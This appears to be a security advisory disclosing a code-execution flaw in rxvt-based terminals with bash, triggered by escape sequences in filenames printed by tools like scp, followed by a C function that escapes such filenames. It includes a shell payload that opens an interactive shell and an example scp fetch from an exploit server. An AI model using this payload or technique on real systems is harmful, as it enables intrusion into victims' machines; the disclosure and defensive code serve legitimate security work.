(u)rxvt terminal (+bash) remoteish code execution 0day
Version: rxvt 2.7.10, rxvt-unicode 9.22, mrxvt 0.5.4, aterm 1.0.1, eterm 0.9.7
Date: 2021-04-20 (updated 2021-05-20)
Author: def <firstname.lastname@example.org>
Threads: oss-security full-disclosure
- rxvt, rxvt-unicode or other rxvt-based terminal
- bash shell. It is possible to target at least ksh as well, but zsh probably not
- User interaction! The victim must enter a command to run a program✱ that ...
  - plants attacker's payload file(s) in a subdirectory of the current directory
  - outputs text containing ANSI escape sequences which trigger the code execution

✱ Suitable target programs include popular CLI tools such as scp, unrar, git-clone ...
Payload (planted as ZZZ/0, ZZZ/1 and/or ZZZ/Z0 in the PoC exploits):
    uname -a && id && date && /bin/sh -i
scp -r exploit@server:/backup/ .
Note: GNU tar is not exploitable due to proper escaping of ANSI escape sequences in filenames!
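The kind of filename escaping the note above credits GNU tar with, sketched for a CLI tool that prints untrusted filenames. This is an added example, not code from the advisory or from GNU tar; the function name escape_filename and the sample filename are assumptions, and the filter is deliberately conservative (every byte outside printable ASCII is escaped).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy `name` into `out`, replacing every byte that is not printable ASCII
 * with a \ooo octal escape and doubling backslashes, so the terminal never
 * receives ESC (0x1b), 8-bit CSI (0x9b) or any other control byte from a
 * filename. Returns the escaped length, or -1 if `out` is too small. */
int escape_filename(const char *name, char *out, size_t outsz)
{
    size_t o = 0;

    if (outsz == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        if (*p == '\\') {                       /* keep the output unambiguous */
            if (o + 2 >= outsz)
                return -1;
            out[o++] = '\\';
            out[o++] = '\\';
        } else if (*p >= 0x20 && *p <= 0x7e) {  /* printable ASCII: pass through */
            if (o + 1 >= outsz)
                return -1;
            out[o++] = (char)*p;
        } else {                                /* control or non-ASCII byte */
            if (o + 4 >= outsz)
                return -1;
            out[o++] = '\\';
            out[o++] = (char)('0' + (*p >> 6));
            out[o++] = (char)('0' + ((*p >> 3) & 7));
            out[o++] = (char)('0' + (*p & 7));
        }
    }
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    /* Constructed sample: a filename carrying a harmless SGR colour sequence. */
    const char *name = "ZZZ\033[31mred\033[0m";
    char safe[256];

    if (escape_filename(name, safe, sizeof safe) < 0)
        return 1;
    printf("%s\n", safe);   /* the escape bytes arrive as visible text */
    return strlen(safe) > strlen(name) ? 0 : 1;
}
```

Because escaping happens on output only, the on-disk name is untouched; a tool that must display non-ASCII names would need a locale-aware printable check instead of the ASCII-only one used here.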